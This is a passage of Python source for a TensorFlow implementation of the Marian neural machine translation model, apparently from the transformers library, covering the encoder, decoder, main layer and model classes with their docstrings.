encoder_hidden_states: Optional[Union[np.ndarray, tf.Tensor]] = None,
encoder_attention_mask: Optional[Union[np.ndarray, tf.Tensor]] = None,
layer_head_mask: Optional[tf.Tensor] = None,
cross_attn_layer_head_mask: Optional[tf.Tensor] = None,
past_key_value: Optional[Tuple[Tuple[Union[np.ndarray, tf.Tensor]]]] = None,
training: Optional[bool] = False,
) -> Tuple[tf.Tensor, tf.Tensor, Tuple[Tuple[tf.Tensor]]]:
"""
Args:
            hidden_states (`tf.Tensor`): input to the layer of shape `(batch, seq_len, embed_dim)`
attention_mask (`tf.Tensor`): attention mask of size
`(batch, 1, tgt_len, src_len)` where padding elements are indicated by very large negative values.
encoder_hidden_states (`tf.Tensor`):
                cross attention input to the layer of shape `(batch, seq_len, embed_dim)`
encoder_attention_mask (`tf.Tensor`): encoder attention mask of size
`(batch, 1, tgt_len, src_len)` where padding elements are indicated by very large negative values.
layer_head_mask (`tf.Tensor`): mask for attention heads in a given layer of size
`(decoder_attention_heads,)`
cross_attn_layer_head_mask (`tf.Tensor`): mask for heads of the cross-attention module.
`(decoder_attention_heads,)`
past_key_value (`Tuple(tf.Tensor)`): cached past key and value projection states
"""
residual = hidden_states
# Self Attention
# decoder uni-directional self-attention cached key/values tuple is at positions 1,2
self_attn_past_key_value = past_key_value[:2] if past_key_value is not None else None
# add present self-attn cache to positions 1,2 of present_key_value tuple
hidden_states, self_attn_weights, present_key_value = self.self_attn(
hidden_states=hidden_states,
past_key_value=self_attn_past_key_value,
attention_mask=attention_mask,
layer_head_mask=layer_head_mask,
)
hidden_states = self.dropout(hidden_states, training=training)
hidden_states = residual + hidden_states
hidden_states = self.self_attn_layer_norm(hidden_states)
# Cross-Attention Block
cross_attn_present_key_value = None
cross_attn_weights = None
if encoder_hidden_states is not None:
residual = hidden_states
# cross_attn cached key/values tuple is at positions 3,4 of present_key_value tuple
cross_attn_past_key_value = past_key_value[-2:] if past_key_value is not None else None
hidden_states, cross_attn_weights, cross_attn_present_key_value = self.encoder_attn(
hidden_states=hidden_states,
key_value_states=encoder_hidden_states,
attention_mask=encoder_attention_mask,
layer_head_mask=cross_attn_layer_head_mask,
past_key_value=cross_attn_past_key_value,
)
hidden_states = self.dropout(hidden_states, training=training)
hidden_states = residual + hidden_states
hidden_states = self.encoder_attn_layer_norm(hidden_states)
# add cross-attn to positions 3,4 of present_key_value tuple
present_key_value = present_key_value + cross_attn_present_key_value
# Fully Connected
residual = hidden_states
hidden_states = self.activation_fn(self.fc1(hidden_states))
hidden_states = self.activation_dropout(hidden_states, training=training)
hidden_states = self.fc2(hidden_states)
hidden_states = self.dropout(hidden_states, training=training)
hidden_states = residual + hidden_states
hidden_states = self.final_layer_norm(hidden_states)
return (
hidden_states,
self_attn_weights,
cross_attn_weights,
present_key_value,
)
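# Note added for clarity (not from the original source): when caching is active, `present_key_value`
# returned above is a 4-tuple laid out as (self_attn_key, self_attn_value, cross_attn_key, cross_attn_value),
# which is why the layer reads the self-attention cache from past_key_value[:2] and the cross-attention
# cache from past_key_value[-2:].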
class TFMarianPreTrainedModel(TFPreTrainedModel):
config_class = MarianConfig
base_model_prefix = "model"
@property
def dummy_inputs(self):
pad_token = 1
input_ids = tf.cast(tf.convert_to_tensor(DUMMY_INPUTS), tf.int32)
decoder_input_ids = tf.cast(tf.convert_to_tensor(DUMMY_INPUTS), tf.int32)
dummy_inputs = {
"decoder_input_ids": decoder_input_ids,
"attention_mask": tf.math.not_equal(input_ids, pad_token),
"input_ids": input_ids,
}
return dummy_inputs
@tf.function(
input_signature=[
{
"input_ids": tf.TensorSpec((None, None), tf.int32, name="input_ids"),
"attention_mask": tf.TensorSpec((None, None), tf.int32, name="attention_mask"),
"decoder_input_ids": tf.TensorSpec((None, None), tf.int32, name="decoder_input_ids"),
"decoder_attention_mask": tf.TensorSpec((None, None), tf.int32, name="decoder_attention_mask"),
}
]
)
# Copied from transformers.models.bart.modeling_tf_bart.TFBartPretrainedModel.serving
def serving(self, inputs):
output = self.call(inputs)
return self.serving_output(output)
MARIAN_START_DOCSTRING = r"""
This model inherits from [`TFPreTrainedModel`]. Check the superclass documentation for the generic methods the
library implements for all its model (such as downloading or saving, resizing the input embeddings, pruning heads
etc.)
This model is also a [tf.keras.Model](https://www.tensorflow.org/api_docs/python/tf/keras/Model) subclass. Use it
as a regular TF 2.0 Keras Model and refer to the TF 2.0 documentation for all matter related to general usage and
behavior.
<Tip>
    TF 2.0 models accept two formats as inputs:
    - having all inputs as keyword arguments (like PyTorch models), or
    - having all inputs as a list, tuple or dict in the first positional argument.
    This second option is useful when using the [`tf.keras.Model.fit`] method, which currently requires having all the
    tensors in the first argument of the model call function: `model(inputs)`.
    If you choose this second option, there are three possibilities you can use to gather all the input Tensors in the
    first positional argument:
- a single Tensor with `input_ids` only and nothing else: `model(input_ids)`
- a list of varying length with one or several input Tensors IN THE ORDER given in the docstring:
`model([input_ids, attention_mask])` or `model([input_ids, attention_mask, token_type_ids])`
- a dictionary with one or several input Tensors associated to the input names given in the docstring:
`model({"input_ids": input_ids, "token_type_ids": token_type_ids})`
</Tip>
Args:
config ([`MarianConfig`]): Model configuration class with all the parameters of the model.
Initializing with a config file does not load the weights associated with the model, only the
configuration. Check out the [`~TFPreTrainedModel.from_pretrained`] method to load the model weights.
"""
MARIAN_GENERATION_EXAMPLE = r"""
TF version of marian-nmt's transformer.h (c++). Designed for the OPUS-NMT translation checkpoints. Available
models are listed [here](https://huggingface.co/models?search=Helsinki-NLP).
Examples:
```python
>>> from transformers import MarianTokenizer, TFMarianMTModel
>>> from typing import List
>>> src = "fr" # source language
>>> trg = "en" # target language
>>> sample_text = "où est l'arrêt de bus ?"
>>> model_name = f"Helsinki-NLP/opus-mt-{src}-{trg}"
>>> model = TFMarianMTModel.from_pretrained(model_name)
>>> tokenizer = MarianTokenizer.from_pretrained(model_name)
>>> batch = tokenizer([sample_text], return_tensors="tf")
>>> gen = model.generate(**batch)
>>> tokenizer.batch_decode(gen, skip_special_tokens=True)
"Where is the bus stop ?"
```
"""
MARIAN_INPUTS_DOCSTRING = r"""
Args:
input_ids (`tf.Tensor` of shape `({0})`):
Indices of input sequence tokens in the vocabulary.
Indices can be obtained using [`MarianTokenizer`]. See [`PreTrainedTokenizer.encode`] and
[`PreTrainedTokenizer.__call__`] for details.
[What are input IDs?](../glossary#input-ids)
attention_mask (`tf.Tensor` of shape `({0})`, *optional*):
Mask to avoid performing attention on padding token indices. Mask values selected in `[0, 1]`:
- 1 for tokens that are **not masked**,
- 0 for tokens that are **masked**.
[What are attention masks?](../glossary#attention-mask)
decoder_input_ids (`tf.Tensor` of shape `(batch_size, target_sequence_length)`, *optional*):
Indices of decoder input sequence tokens in the vocabulary.
Indices can be obtained using [`MarianTokenizer`]. See [`PreTrainedTokenizer.encode`] and
[`PreTrainedTokenizer.__call__`] for details.
[What are decoder input IDs?](../glossary#decoder-input-ids)
Marian uses the `pad_token_id` as the starting token for `decoder_input_ids` generation. If
`past_key_values` is used, optionally only the last `decoder_input_ids` have to be input (see
`past_key_values`).
decoder_attention_mask (`tf.Tensor` of shape `(batch_size, target_sequence_length)`, *optional*):
            A mask will be made by default that ignores pad tokens. It is not recommended to set this for most use cases.
decoder_position_ids (`tf.Tensor` of shape `(batch_size, sequence_length)`, *optional*):
Indices of positions of each decoder input sequence tokens in the position embeddings. Selected in the
range `[0, config.max_position_embeddings - 1]`.
head_mask (`tf.Tensor` of shape `(encoder_layers, encoder_attention_heads)`, *optional*):
Mask to nullify selected heads of the attention modules in the encoder. Mask values selected in `[0, 1]`:
- 1 indicates the head is **not masked**,
- 0 indicates the head is **masked**.
decoder_head_mask (`tf.Tensor` of shape `(decoder_layers, decoder_attention_heads)`, *optional*):
Mask to nullify selected heads of the attention modules in the decoder. Mask values selected in `[0, 1]`:
- 1 indicates the head is **not masked**,
- 0 indicates the head is **masked**.
cross_attn_head_mask (`tf.Tensor` of shape `(decoder_layers, decoder_attention_heads)`, *optional*):
Mask to nullify selected heads of the cross-attention modules. Mask values selected in `[0, 1]`:
- 1 indicates the head is **not masked**,
- 0 indicates the head is **masked**.
        encoder_outputs (`tf.FloatTensor`, *optional*):
            Sequence of hidden states at the output of the last layer of the encoder, of shape
            `(batch_size, sequence_length, hidden_size)`. Used in the cross-attention of the decoder.
        past_key_values (`Tuple[Tuple[tf.Tensor]]` of length `config.n_layers`):
            Contains precomputed key and value hidden states of the attention blocks. Can be used to speed up decoding.
If `past_key_values` are used, the user can optionally input only the last `decoder_input_ids` (those that
don't have their past key value states given to this model) of shape `(batch_size, 1)` instead of all
`decoder_input_ids` of shape `(batch_size, sequence_length)`.
use_cache (`bool`, *optional*, defaults to `True`):
If set to `True`, `past_key_values` key value states are returned and can be used to speed up decoding (see
            `past_key_values`). Set to `False` during training and `True` during generation.
output_attentions (`bool`, *optional*):
Whether or not to return the attentions tensors of all attention layers. See `attentions` under returned
tensors for more detail. This argument can be used only in eager mode, in graph mode the value in the
config will be used instead.
output_hidden_states (`bool`, *optional*):
Whether or not to return the hidden states of all layers. See `hidden_states` under returned tensors for
more detail. This argument can be used only in eager mode, in graph mode the value in the config will be
used instead.
return_dict (`bool`, *optional*):
Whether or not to return a [`~utils.ModelOutput`] instead of a plain tuple. This argument can be used in
eager mode, in graph mode the value will always be set to True.
training (`bool`, *optional*, defaults to `False`):
Whether or not to use the model in training mode (some modules like dropout modules have different
behaviors between training and evaluation).
"""
@keras_serializable
class TFMarianEncoder(tf.keras.layers.Layer):
config_class = MarianConfig
"""
Transformer encoder consisting of *config.encoder_layers* self attention layers. Each layer is a
[`TFMarianEncoderLayer`].
Args:
config: MarianConfig
"""
def __init__(self, config: MarianConfig, embed_tokens: Optional[TFSharedEmbeddings] = None, **kwargs):
super().__init__(**kwargs)
self.config = config
self.dropout = tf.keras.layers.Dropout(config.dropout)
self.layerdrop = config.encoder_layerdrop
self.padding_idx = config.pad_token_id
self.max_source_positions = config.max_position_embeddings
self.embed_scale = tf.math.sqrt(float(config.d_model)) if config.scale_embedding else 1.0
self.embed_tokens = embed_tokens
self.embed_positions = TFMarianSinusoidalPositionalEmbedding(
config.max_position_embeddings,
config.d_model,
name="embed_positions",
)
self.layers = [TFMarianEncoderLayer(config, name=f"layers.{i}") for i in range(config.encoder_layers)]
def get_embed_tokens(self):
return self.embed_tokens
def set_embed_tokens(self, embed_tokens):
self.embed_tokens = embed_tokens
@unpack_inputs
def call(
self,
input_ids=None,
inputs_embeds=None,
attention_mask=None,
head_mask=None,
output_attentions=None,
output_hidden_states=None,
return_dict=None,
training=False,
):
"""
Args:
input_ids (`tf.Tensor` of shape `(batch_size, sequence_length)`):
Indices of input sequence tokens in the vocabulary. Padding will be ignored by default should you
provide it.
Indices can be obtained using [`MarianTokenizer`]. See [`PreTrainedTokenizer.encode`] and
[`PreTrainedTokenizer.__call__`] for details.
[What are input IDs?](../glossary#input-ids)
attention_mask (`tf.Tensor` of shape `(batch_size, sequence_length)`, *optional*):
Mask to avoid performing attention on padding token indices. Mask values selected in `[0, 1]`:
- 1 for tokens that are **not masked**,
- 0 for tokens that are **masked**.
[What are attention masks?](../glossary#attention-mask)
                head_mask (`tf.Tensor` of shape `(encoder_layers, encoder_attention_heads)`, *optional*):
Mask to nullify selected heads of the attention modules. Mask values selected in `[0, 1]`:
- 1 indicates the head is **not masked**,
- 0 indicates the head is **masked**.
inputs_embeds (`tf.Tensor` of shape `(batch_size, sequence_length, hidden_size)`, *optional*):
Optionally, instead of passing `input_ids` you can choose to directly pass an embedded representation.
This is useful if you want more control over how to convert `input_ids` indices into associated vectors
than the model's internal embedding lookup matrix.
output_attentions (`bool`, *optional*):
Whether or not to return the attentions tensors of all attention layers. See `attentions` under
returned tensors for more detail. This argument can be used only in eager mode, in graph mode the value
in the config will be used instead.
output_hidden_states (`bool`, *optional*):
Whether or not to return the hidden states of all layers. See `hidden_states` under returned tensors
for more detail. This argument can be used only in eager mode, in graph mode the value in the config
will be used instead.
return_dict (`bool`, *optional*):
Whether or not to return a [`~utils.ModelOutput`] instead of a plain tuple. This argument can be used
in eager mode, in graph mode the value will always be set to True.
training (`bool`, *optional*, defaults to `False`):
Whether or not to use the model in training mode (some modules like dropout modules have different
behaviors between training and evaluation).
"""
if input_ids is not None and inputs_embeds is not None:
raise ValueError("You cannot specify both input_ids and inputs_embeds at the same time")
elif input_ids is not None:
input_shape = shape_list(input_ids)
elif inputs_embeds is not None:
input_shape = shape_list(inputs_embeds)[:-1]
else:
raise ValueError("You have to specify either input_ids or inputs_embeds")
if inputs_embeds is None:
inputs_embeds = self.embed_tokens(input_ids) * self.embed_scale
embed_pos = self.embed_positions(input_shape)
hidden_states = inputs_embeds + embed_pos
hidden_states = self.dropout(hidden_states, training=training)
# check attention mask and invert
if attention_mask is not None:
# [bsz, seq_len] -> [bsz, 1, tgt_seq_len, src_seq_len]
attention_mask = _expand_mask(attention_mask)
else:
attention_mask = None
encoder_states = () if output_hidden_states else None
all_attentions = () if output_attentions else None
# check if head_mask has a correct number of layers specified if desired
        # The tf.debugging asserts are not compliant with XLA, so they
        # have to be disabled in modes other than eager execution.
if head_mask is not None and tf.executing_eagerly():
tf.debugging.assert_equal(
shape_list(head_mask)[0],
len(self.layers),
message=(
f"The head_mask should be specified for {len(self.layers)} layers, but it is for"
f" {shape_list(head_mask)[0]}."
),
)
# encoder layers
for idx, encoder_layer in enumerate(self.layers):
if output_hidden_states:
encoder_states = encoder_states + (hidden_states,)
# add LayerDrop (see https://arxiv.org/abs/1909.11556 for description)
dropout_probability = random.uniform(0, 1)
if training and (dropout_probability < self.layerdrop): # skip the layer
continue
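            # Example added for clarity (assumed numbers, not from the original source): with
            # config.encoder_layerdrop = 0.1, each encoder layer is independently skipped with
            # probability ~0.1 during training, and never skipped at inference time.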
hidden_states, attn = encoder_layer(
hidden_states,
attention_mask,
head_mask[idx] if head_mask is not None else None,
)
if output_attentions:
all_attentions += (attn,)
if output_hidden_states:
encoder_states = encoder_states + (hidden_states,)
if not return_dict:
return tuple(v for v in [hidden_states, encoder_states, all_attentions] if v is not None)
return TFBaseModelOutput(
last_hidden_state=hidden_states, hidden_states=encoder_states, attentions=all_attentions
)
@keras_serializable
class TFMarianDecoder(tf.keras.layers.Layer):
config_class = MarianConfig
"""
Transformer decoder consisting of *config.decoder_layers* layers. Each layer is a [`TFMarianDecoderLayer`]
Args:
config: MarianConfig
embed_tokens: output embedding
"""
def __init__(self, config: MarianConfig, embed_tokens: Optional[TFSharedEmbeddings] = None, **kwargs):
super().__init__(**kwargs)
self.config = config
self.padding_idx = config.pad_token_id
self.embed_tokens = embed_tokens
self.layerdrop = config.decoder_layerdrop
self.embed_positions = TFMarianSinusoidalPositionalEmbedding(
config.max_position_embeddings,
config.d_model,
name="embed_positions",
)
self.embed_scale = tf.math.sqrt(float(config.d_model)) if config.scale_embedding else 1.0
self.layers = [TFMarianDecoderLayer(config, name=f"layers.{i}") for i in range(config.decoder_layers)]
self.dropout = tf.keras.layers.Dropout(config.dropout)
def get_embed_tokens(self):
return self.embed_tokens
def set_embed_tokens(self, embed_tokens):
self.embed_tokens = embed_tokens
@unpack_inputs
def call(
self,
input_ids=None,
inputs_embeds=None,
attention_mask=None,
position_ids=None,
encoder_hidden_states=None,
encoder_attention_mask=None,
head_mask=None,
cross_attn_head_mask=None,
past_key_values=None,
use_cache=None,
output_attentions=None,
output_hidden_states=None,
return_dict=None,
training=False,
):
r"""
Args:
input_ids (`tf.Tensor` of shape `(batch_size, sequence_length)`):
Indices of input sequence tokens in the vocabulary. Padding will be ignored by default should you
provide it.
Indices can be obtained using [`MarianTokenizer`]. See [`PreTrainedTokenizer.encode`] and
[`PreTrainedTokenizer.__call__`] for details.
[What are input IDs?](../glossary#input-ids)
attention_mask (`tf.Tensor` of shape `(batch_size, sequence_length)`, *optional*):
Mask to avoid performing attention on padding token indices. Mask values selected in `[0, 1]`:
- 1 for tokens that are **not masked**,
- 0 for tokens that are **masked**.
[What are attention masks?](../glossary#attention-mask)
position_ids (`tf.Tensor` of shape `(batch_size, sequence_length)`, *optional*):
Indices of positions of each decoder input sequence tokens in the position embeddings. Selected in the
range `[0, config.max_position_embeddings - 1]`.
encoder_hidden_states (`tf.Tensor` of shape `(batch_size, encoder_sequence_length, hidden_size)`, *optional*):
Sequence of hidden-states at the output of the last layer of the encoder. Used in the cross-attention
of the decoder.
encoder_attention_mask (`tf.Tensor` of shape `(batch_size, encoder_sequence_length)`, *optional*):
Mask to avoid performing cross-attention on padding tokens indices of encoder input_ids. Mask values
selected in `[0, 1]`:
- 1 for tokens that are **not masked**,
- 0 for tokens that are **masked**.
[What are attention masks?](../glossary#attention-mask)
head_mask (`tf.Tensor` of shape `(decoder_layers, decoder_attention_heads)`, *optional*):
Mask to nullify selected heads of the attention modules. Mask values selected in `[0, 1]`:
- 1 indicates the head is **not masked**,
- 0 indicates the head is **masked**.
cross_attn_head_mask (`tf.Tensor` of shape `(decoder_layers, decoder_attention_heads)`, *optional*):
Mask to nullify selected heads of the cross-attention modules. Mask values selected in `[0, 1]`:
- 1 indicates the head is **not masked**,
- 0 indicates the head is **masked**.
past_key_values (`Tuple[Tuple[tf.Tensor]]` of length `config.n_layers` with each tuple having 2 tuples each of which has 2 tensors of shape `(batch_size, num_heads, sequence_length - 1, embed_size_per_head)`):
Contains precomputed key and value hidden-states of the attention blocks. Can be used to speed up
decoding.
                If `past_key_values` are used, the user can optionally input only the last `decoder_input_ids` (those
                that don't have their past key value states given to this model) of shape `(batch_size, 1)` instead of
                all `decoder_input_ids` of shape `(batch_size, sequence_length)`.
            inputs_embeds (`tf.Tensor` of shape `(batch_size, sequence_length, hidden_size)`, *optional*):
                Optionally, instead of passing `input_ids` you can choose to directly pass an embedded representation.
                This is useful if you want more control over how to convert `input_ids` indices into associated vectors
                than the model's internal embedding lookup matrix.
output_attentions (`bool`, *optional*):
Whether or not to return the attentions tensors of all attention layers. See `attentions` under
returned tensors for more detail. This argument can be used only in eager mode, in graph mode the value
in the config will be used instead.
output_hidden_states (`bool`, *optional*):
Whether or not to return the hidden states of all layers. See `hidden_states` under returned tensors
for more detail. This argument can be used only in eager mode, in graph mode the value in the config
will be used instead.
return_dict (`bool`, *optional*):
Whether or not to return a [`~utils.ModelOutput`] instead of a plain tuple. This argument can be used
in eager mode, in graph mode the value will always be set to True.
training (`bool`, *optional*, defaults to `False`):
Whether or not to use the model in training mode (some modules like dropout modules have different
behaviors between training and evaluation).
"""
if input_ids is not None and inputs_embeds is not None:
raise ValueError("You cannot specify both decoder_input_ids and decoder_inputs_embeds at the same time")
elif input_ids is not None:
input_shape = shape_list(input_ids)
elif inputs_embeds is not None:
input_shape = shape_list(inputs_embeds)[:-1]
else:
raise ValueError("You have to specify either decoder_input_ids or decoder_inputs_embeds")
past_key_values_length = shape_list(past_key_values[0][0])[2] if past_key_values is not None else 0
# embed positions
if position_ids is None:
positions = self.embed_positions(input_shape, past_key_values_length)
else:
positions = self.embed_positions(input_shape, position_ids=position_ids)
if inputs_embeds is None:
inputs_embeds = self.embed_tokens(input_ids) * self.embed_scale
hidden_states = inputs_embeds
# [bsz, seq_len] -> [bsz, 1, tgt_seq_len, src_seq_len]
if input_shape[-1] > 1:
combined_attention_mask = _make_causal_mask(input_shape, past_key_values_length=past_key_values_length)
else:
combined_attention_mask = _expand_mask(
tf.ones((input_shape[0], input_shape[1] + past_key_values_length)), tgt_len=input_shape[-1]
)
if attention_mask is not None:
combined_attention_mask = combined_attention_mask + _expand_mask(attention_mask, tgt_len=input_shape[-1])
if encoder_hidden_states is not None and encoder_attention_mask is not None:
# [bsz, seq_len] -> [bsz, 1, tgt_seq_len, src_seq_len]
encoder_attention_mask = _expand_mask(encoder_attention_mask, tgt_len=input_shape[-1])
hidden_states = self.dropout(hidden_states + positions, training=training)
# decoder layers
all_hidden_states = () if output_hidden_states else None
all_self_attns = () if output_attentions else None
all_cross_attns = () if (output_attentions and encoder_hidden_states is not None) else None
present_key_values = () if use_cache else None
# check if head_mask and cross_attn_head_mask have a correct number of layers specified if desired
        # The tf.debugging asserts are not compliant with XLA, so they
        # have to be disabled in modes other than eager execution.
for attn_name, attn_mask in [("head_mask", head_mask), ("cross_attn_head_mask", cross_attn_head_mask)]:
if attn_mask is not None and tf.executing_eagerly():
tf.debugging.assert_equal(
shape_list(attn_mask)[0],
len(self.layers),
message=(
f"The {attn_name} should be specified for {len(self.layers)} layers, but it is for"
f" {shape_list(attn_mask)[0]}."
),
)
for idx, decoder_layer in enumerate(self.layers):
# add LayerDrop (see https://arxiv.org/abs/1909.11556 for description)
if output_hidden_states:
all_hidden_states += (hidden_states,)
dropout_probability = random.uniform(0, 1)
if training and (dropout_probability < self.layerdrop):
continue
past_key_value = past_key_values[idx] if past_key_values is not None else None
hidden_states, layer_self_attn, layer_cross_attn, present_key_value = decoder_layer(
hidden_states,
attention_mask=combined_attention_mask,
encoder_hidden_states=encoder_hidden_states,
encoder_attention_mask=encoder_attention_mask,
layer_head_mask=head_mask[idx] if head_mask is not None else None,
cross_attn_layer_head_mask=cross_attn_head_mask[idx] if cross_attn_head_mask is not None else None,
past_key_value=past_key_value,
)
if use_cache:
present_key_values += (present_key_value,)
if output_attentions:
all_self_attns += (layer_self_attn,)
if encoder_hidden_states is not None:
all_cross_attns += (layer_cross_attn,)
if output_hidden_states:
all_hidden_states += (hidden_states,)
if not return_dict:
return hidden_states, present_key_values, all_hidden_states, all_self_attns, all_cross_attns
else:
return TFBaseModelOutputWithPastAndCrossAttentions(
last_hidden_state=hidden_states,
past_key_values=present_key_values,
hidden_states=all_hidden_states,
attentions=all_self_attns,
cross_attentions=all_cross_attns,
)
@keras_serializable
class TFMarianMainLayer(tf.keras.layers.Layer):
config_class = MarianConfig
def __init__(self, config: MarianConfig, **kwargs):
super().__init__(**kwargs)
self.config = config
self.shared = TFSharedEmbeddings(config.vocab_size, config.d_model, config.pad_token_id, name="model.shared")
with tf.compat.v1.variable_scope("model.shared") as shared_abs_scope_name:
pass
# Wraps layer to avoid problems with weight restoring and ensuring we're in the correct TF scope.
embed_tokens = TFWrappedEmbeddings(self.shared, abs_scope_name=shared_abs_scope_name)
embed_tokens.vocab_size = self.shared.vocab_size
embed_tokens.hidden_size = self.shared.hidden_size
self.encoder = TFMarianEncoder(config, embed_tokens, name="encoder")
self.decoder = TFMarianDecoder(config, embed_tokens, name="decoder")
def get_input_embeddings(self):
return self.shared
def set_input_embeddings(self, new_embeddings):
self.shared.weight = new_embeddings
self.shared.vocab_size = self.shared.weight.shape[0]
# retrieve correct absolute scope for embed token wrapper
with tf.compat.v1.variable_scope("model.shared") as shared_abs_scope_name:
pass
# Wraps layer to avoid problems with weight restoring and ensuring we're in the correct TF scope.
embed_tokens = TFWrappedEmbeddings(self.shared, abs_scope_name=shared_abs_scope_name)
self.encoder.set_embed_tokens(embed_tokens)
self.decoder.set_embed_tokens(embed_tokens)
@unpack_inputs
def call(
self,
input_ids=None,
attention_mask=None,
decoder_input_ids=None,
decoder_attention_mask=None,
decoder_position_ids=None,
head_mask=None,
decoder_head_mask=None,
cross_attn_head_mask=None,
encoder_outputs: Optional[Union[Tuple, TFBaseModelOutput]] = None,
past_key_values=None,
inputs_embeds=None,
decoder_inputs_embeds=None,
use_cache=None,
output_attentions=None,
output_hidden_states=None,
return_dict=None,
training=False,
**kwargs
):
if decoder_input_ids is None and decoder_inputs_embeds is None:
use_cache = False
output_hidden_states = (
output_hidden_states if output_hidden_states is not None else self.config.output_hidden_states
)
if encoder_outputs is None:
encoder_outputs = self.encoder(
input_ids=input_ids,
attention_mask=attention_mask,
head_mask=head_mask,
inputs_embeds=inputs_embeds,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
training=training,
)
# If the user passed a tuple for encoder_outputs, we wrap it in a TFBaseModelOutput when return_dict=True
elif return_dict and not isinstance(encoder_outputs, TFBaseModelOutput):
encoder_outputs = TFBaseModelOutput(
last_hidden_state=encoder_outputs[0],
hidden_states=encoder_outputs[1] if len(encoder_outputs) > 1 else None,
attentions=encoder_outputs[2] if len(encoder_outputs) > 2 else None,
)
# If the user passed a TFBaseModelOutput for encoder_outputs, we wrap it in a tuple when return_dict=False
elif not return_dict and not isinstance(encoder_outputs, tuple):
encoder_outputs = encoder_outputs.to_tuple()
decoder_outputs = self.decoder(
decoder_input_ids,
attention_mask=decoder_attention_mask,
position_ids=decoder_position_ids,
encoder_hidden_states=encoder_outputs[0],
encoder_attention_mask=attention_mask,
head_mask=decoder_head_mask,
cross_attn_head_mask=cross_attn_head_mask,
past_key_values=past_key_values,
inputs_embeds=decoder_inputs_embeds,
use_cache=use_cache,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
training=training,
)
if not return_dict:
return decoder_outputs + encoder_outputs
return TFSeq2SeqModelOutput(
last_hidden_state=decoder_outputs.last_hidden_state,
past_key_values=decoder_outputs.past_key_values,
decoder_hidden_states=decoder_outputs.hidden_states,
decoder_attentions=decoder_outputs.attentions,
cross_attentions=decoder_outputs.cross_attentions,
encoder_last_hidden_state=encoder_outputs.last_hidden_state,
encoder_hidden_states=encoder_outputs.hidden_states,
encoder_attentions=encoder_outputs.attentions,
)
@add_start_docstrings(
"The bare MARIAN Model outputting raw hidden-states without any specific head on top.",
MARIAN_START_DOCSTRING,
)
class TFMarianModel(TFMarianPreTrainedModel):
def __init__(self, config: MarianConfig, *inputs, **kwargs):
super().__init__(config, *inputs, **kwargs)
self.model = TFMarianMainLayer(config, name="model")
def get_encoder(self):
return self.model.encoder
def get_decoder(self):
return self.model.decoder
@unpack_inputs
@add_start_docstrings_to_model_forward(MARIAN_INPUTS_DOCSTRING.format("batch_size, sequence_length"))
@add_code_sample_docstrings(
processor_class=_TOKENIZER_FOR_DOC,
checkpoint=_CHECKPOINT_FOR_DOC,
output_type=TFSeq2SeqModelOutput,
config_class=_CONFIG_FOR_DOC,
)
def call(
self,
input_ids=None,
attention_mask=None,
decoder_input_ids=None,
decoder_attention_mask=None,
decoder_position_ids=None,
head_mask=None,
decoder_head_mask=None,
cross_attn_head_mask=None,
encoder_outputs: Optional[Union[Tuple, TFBaseModelOutput]] = None,
past_key_values=None,
inputs_embeds=None,
decoder_inputs_embeds=None,
use_cache=None,
output_attentions=None,
output_hidden_states=None,
return_dict=None,
training=False,
**kwargs
):
outputs = self.model(
input_ids=input_ids,
attention_mask=attention_mask,
decoder_input_ids=decoder_input_ids,
decoder_attention_mask=decoder_attention_mask,
decoder_position_ids=decoder_position_ids,
head_mask=head_mask,
decoder_head_mask=decoder_head_mask,
cross_attn_head_mask=cross_attn_head_mask,
encoder_outputs=encoder_outputs,
past_key_values=past_key_values,
inputs_embeds=inputs_embeds,
decoder_inputs_embeds=decoder_inputs_embeds,
use_cache=use_cache,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
training=training,
)
return outputs
# Copied from transformers.models.bart.modeling_tf_bart.TFBartModel.serving_output
def serving_output(self, output):
pkv = tf.tuple(output.past_key_values)[1] if self.config.use_cache else None
dec_hs = tf.convert_to_tensor(output.decoder_hidden_states) if self.config.output_hidden_states else None
dec_attns = tf.convert_to_tensor(output.decoder_attentions) if self.config.output_attentions else None
cross_attns = tf.convert_to_tensor(output.cross_attentions) if self.config.output_attentions else None
enc_hs = tf.convert_to_tensor(output.encoder_hidden_states) if self.config.output_hidden_states else None
enc_attns = tf.convert_to_tensor(output.encoder_attentions) if self.config.output_attentions else None
return TFSeq2SeqModelOutput(
last_hidden_state=output.last_hidden_state,
past_key_values=pkv,
decoder_hidden_states=dec_hs,
decoder_attentions=dec_attns,
cross_attentions=cross_attns,
encoder_last_hidden_state=output.encoder_last_hidden_state,
encoder_hidden_states=enc_hs,
encoder_attentions=enc_attns,
)
@add_start_docstrings(
"The MARIAN Model with a language modeling head. Can be used for summarization.",
MARIAN_START_DOCSTRING,
)
class TFMarianMTModel(TFMarianPreTrainedModel, TFCausalLanguageModelingLoss):
_keys_to_ignore_on_load_unexpected = [
r"model.encoder.embed_tokens.weight",
r"model.decoder.embed_tokens.weight",
]
def __init__(self, config, *inputs, **kwargs):
super().__init__(config, *inputs, **kwargs)
self.model = TFMarianMainLayer(config, name="model")
self.use_cache = config.use_cache
        # final_logits_bias is registered as a buffer in PyTorch, so it is kept non-trainable here for the sake of consistency.
self.final_logits_bias = self.add_weight(
name="final_logits_bias", shape=[1, config.vocab_size], initializer="zeros", trainable=False
)
def get_decoder(self):
return self.model.decoder
def get_encoder(self):
return self.model.encoder
def get_output_embeddings(self):
return self.get_input_embeddings()
def set_output_embeddings(self, value):
self.set_input_embeddings(value)
def get_bias(self):
return {"final_logits_bias": self.final_logits_bias}
def set_bias(self, value):
self.final_logits_bias = value["final_logits_bias"]
@unpack_inputs
@add_start_docstrings_to_model_forward(MARIAN_INPUTS_DOCSTRING)
@replace_return_docstrings(output_type=TFSeq2SeqLMOutput, config_class=_CONFIG_FOR_DOC)
@add_end_docstrings(MARIAN_GENERATION_EXAMPLE)
def call(
self,
input_ids=None,
attention_mask=None,
decoder_input_ids=None,
decoder_attention_mask=None,
decoder_position_ids=None,
head_mask=None,
decoder_head_mask=None,
cross_attn_head_mask=None,
encoder_outputs: Optional[TFBaseModelOutput] = None,
past_key_values=None,
inputs_embeds=None,
decoder_inputs_embeds=None,
use_cache=None,
output_attentions=None,
output_hidden_states=None,
return_dict=None,
labels=None,
training=False,
):
r"""
        labels (`tf.Tensor` of shape `(batch_size, sequence_length)`, *optional*):
Labels for computing the masked language modeling loss. Indices should either be in `[0, ...,
config.vocab_size]` or -100 (see `input_ids` docstring). Tokens with indices set to `-100` are ignored
